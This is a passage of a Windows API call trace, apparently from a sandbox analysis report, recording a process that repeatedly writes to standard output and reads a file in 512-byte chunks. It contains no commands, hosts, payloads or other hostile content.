_get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.152] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.152] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] GetFileType (hFile=0x50) returned 0x1 [0211.152] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.152] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.153] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.153] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] GetFileType (hFile=0x50) returned 0x1 [0211.153] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.153] WriteFile (in: hFile=0x50, lpBuffer=0x2aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2aefd4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af024*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af024*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af074*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af074*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af0c4*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af114*, lpNumberOfBytesWritten=0x2ae168*=0x50, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] GetFileType (hFile=0x50) returned 0x1 [0211.154] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.154] WriteFile (in: hFile=0x50, lpBuffer=0x2af164*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae168, lpOverlapped=0x0 | out: lpBuffer=0x2af164*, lpNumberOfBytesWritten=0x2ae168*=0x20, lpOverlapped=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.154] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae154 | out: lpNewFilePointer=0x0) returned 1 [0211.154] _get_osfhandle (_FileHandle=4) returned 0x58 [0211.154] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.155] _get_osfhandle (_FileHandle=1) returned 0x50 [0211.155] GetFileType (hFile=0x50) returned 0x1 [0211.155] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.155] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.156] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.157] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.158] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.159] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.160] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: lpBuffer=0x2aef84*, lpNumberOfBytesRead=0x2ae174*=0x200, lpOverlapped=0x0) returned 1 [0211.161] ReadFile (in: hFile=0x58, lpBuffer=0x2aef84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae174, lpOverlapped=0x0 | out: 